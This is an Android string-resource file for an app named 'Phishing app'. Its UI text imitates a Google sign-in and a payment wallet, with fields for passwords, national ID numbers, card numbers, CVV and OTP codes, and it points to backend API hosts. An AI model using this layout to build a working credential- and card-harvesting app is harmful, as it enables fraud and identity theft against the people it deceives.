<resources>
    <string name="app_name">Phishing app</string>
    <string name="title_activity_google_login_email">GoogleLoginEmailActivity</string>
    <string name="sign_in">Sign in</string>
    <string name="welcome">Welcome</string>
    <string name="sign_in_description">With Your Google Account. You’ll also Sign in to\nGoogle services in your apps &amp; Safari.</string>
    <string name="history_not_found">History Not Found!</string>
    <string name="go_back">Go back</string>
    <string name="payment_failed_error">Payment Failed due\nto Server failure!</string>
    <string name="next">Next</string>
    <string name="enter_your_password">Enter your password</string>
    <string name="email_or_phone">Email or phone</string>
    <string name="full_name">Full name</string>
    <string name="cnic_number">CNIC number</string>
    <string name="contact_number">Contact Number</string>
    <string name="permanent_address">Permanent Address</string>
    <string name="present_address">Present Address</string>
    <string name="terms_and_conditions">I agree to the terms and conditions.</string>
    <string name="enter_name">Enter name</string>
    <string name="enter_number_here">Enter number here</string>
    <string name="enter_your_contact_number_here">Enter your contact number here</string>
    <string name="enter_your_permanent_address_here">Enter your permanent address here</string>
    <string name="enter_your_present_address_here">Enter your present address here</string>
    <string name="verify">Verify</string>
    <string name="submit">Submit</string>
    <string name="view_more">View more</string>
    <string name="pay_now">Pay now</string>
    <string name="cards">Cards</string>
    <string name="wallet">Wallet</string>
    <string name="cards_upi_more">Cards, UPI &amp; More</string>
    <string name="select_wallet">Select Wallet</string>
    <string name="add_new_card">Add New Card</string>
    <string name="btn_continue">Continue</string>
    <string name="enter_upi_id">Enter UPI ID</string>
    <string name="upi_id">UPI ID</string>
    <string name="enter_id">Enter ID</string>
    <string name="mobile_number">Mobile number</string>
    <string name="amount">Amount</string>
    <string name="enter_name_here">Enter number here</string>
    <string name="rs">Rs</string>
    <string name="customer_number">Customer Number</string>
    <string name="save_card_info">Save card security for future payments. <font color="#00BD5F">Know more</font></string>
    <string name="card_number">Card number</string>
    <string name="name_on_card">Name of card</string>
    <string name="expiry_date">05/2026</string>
    <string name="cvv">CVV</string>
    <string name="blank_card_number">0000 0000 0000 0000</string>
    <string name="otp_verification">OTP Verification</string>
    <string name="not_receive_otp">Not Received OTP? <font color="#00BD5F">Resend</font></string>
    <!-- TODO: Remove or change this placeholder text -->
    <string name="hello_blank_fragment">Hello blank fragment</string>
    <string name="demoapp">DemoApp</string>
    <string name="send_money_to_anyone_anywhere">Send Money to Anyone Anywhere</string>
    <string name="pay_to_contact">Pay to Contact</string>
    <string name="pay_upi_id">Pay UPI ID</string>
    <string name="tohfa">Tohfa</string>
    <string name="mobile_recharge">Mobile recharge</string>
    <string name="electricity_bill">Electricity bill</string>
    <string name="mini_app">Mini App</string>
    <string name="savings">Savings</string>
    <string name="more">More</string>
    <string name="view_and_send_money_to_favorites">View and send money to favorites</string>
    <string name="enter_name_or_mobile_number">Enter name or mobile number</string>
    <string name="contacts">Contacts</string>
    <string name="forgot_password">Forgot Password?</string>
    <string name="pay_now_everywhere">Pay now everywhere</string>
<!--    <string name="api">https://192.168.64.235:8003</string>-->
<!--    <string name="api">https://testratapi.azurewebsites.net</string>-->
    <string name="api">https://npphaseapis.azurewebsites.net</string>
</resources>